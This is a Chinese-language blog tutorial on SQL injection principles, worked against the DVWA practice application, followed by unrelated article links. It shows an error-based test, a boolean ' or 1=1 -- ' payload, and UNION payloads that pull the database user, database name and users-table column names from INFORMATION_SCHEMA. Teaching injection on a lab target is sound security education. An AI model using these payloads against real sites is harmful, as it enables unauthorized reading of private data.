owasp SQL 注入-03 (原理)

1: 先看一下注入界面:

点submit 后,可以看到有语法报错,说明已经起作用了:

报如下的错误:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

2:

SQL 注入语句解析:

Mysql>select first_name,last_name from dvwa.users;

Mysql>select first_name,last_name from dvwa.users where user_id='1';

mysql> select first_name,last_name from dvwa.users where user_id='1';

+------------+-----------+

| first_name | last_name |

+------------+-----------+

| admin | admin |

+------------+-----------+

1 row in set (0.00 sec)

2: 下面开始布尔注入:( or 或 and 和 的测试)

点击submit 看结果:

原因是: 先看上面的注入语句:

Mysql>select first_name,last_name from dvwa.users where user_id=' ' or 1=1 -- sheng';

看到上面的标绿色的 已经闭环了,后面的 -- 就把后面的所有的 开始认为是 注释内容,不参加反应了。

下面总结一下:

mysql> select first_name,last_name from dvwa.users where user_id=' ' union select user(),database() --'

'> ';

+----------------+-----------+

| first_name | last_name |

+----------------+-----------+

| root@localhost | NULL |

+----------------+-----------+

1 row in set (0.00 sec)

--

这条语句就可以看出是哪个user 来链接数据库的:

'union select user(), database() -- '

注意: 上面的语句-- 后面有空格:

看执行结果:

可以看到是用dvwa 用户来链接数据库的。

下面的SQL 注入的语句如下:

下面是关于字段的 SQL 注入语句:

下面看一下 输出结果:

'union select 1, column_name from INFORMATION_SCHEMA.columns where table_name='users' -- '

下面输出结果:

可以看出后面表的字段,就是这样被SQL 注入得到信息的。

参考文献: 13.SQL注入攻击_哔哩哔哩_bilibili

相关推荐
一 乐2 分钟前
口腔健康系统|口腔医疗|基于java和小程序的口腔健康系统小程序设计与实现(源码+数据库+文档)
java·数据库·vue.js·小程序·毕设
vivo互联网技术13 分钟前
Redis key 消失之谜
数据库·redis·内存淘汰策略·redis抓包分析·机制分析
TDengine (老段)29 分钟前
TDengine 数据函数 TAN 用户手册
java·大数据·数据库·物联网·时序数据库·tdengine·涛思数据
TDengine (老段)30 分钟前
TDengine 数学函数 SQRT 用户手册
java·大数据·数据库·物联网·时序数据库·tdengine·1024程序员节
档案宝档案管理42 分钟前
零售行业档案管理的痛点与解决方案:档案管理系统显身手
大数据·数据库·人工智能·档案·零售·档案管理
艾菜籽1 小时前
MyBatis动态sql与留言墙联系
java·数据库·sql·spring·mybatis
weixin_307779131 小时前
C#程序实现将Teradata的存储过程转换为Amazon Redshift的pgsql的存储过程
数据库·c#·云计算·运维开发·aws
青~1 小时前
sql 双游标循环
数据库·sql
一辉ComeOn1 小时前
【大数据高并发核心场景实战】 数据持久化层 - 查询分离
java·大数据·数据库·elasticsearch·缓存·oracle
雾里云山1 小时前
pgsql常用函数
java·开发语言·数据库·sql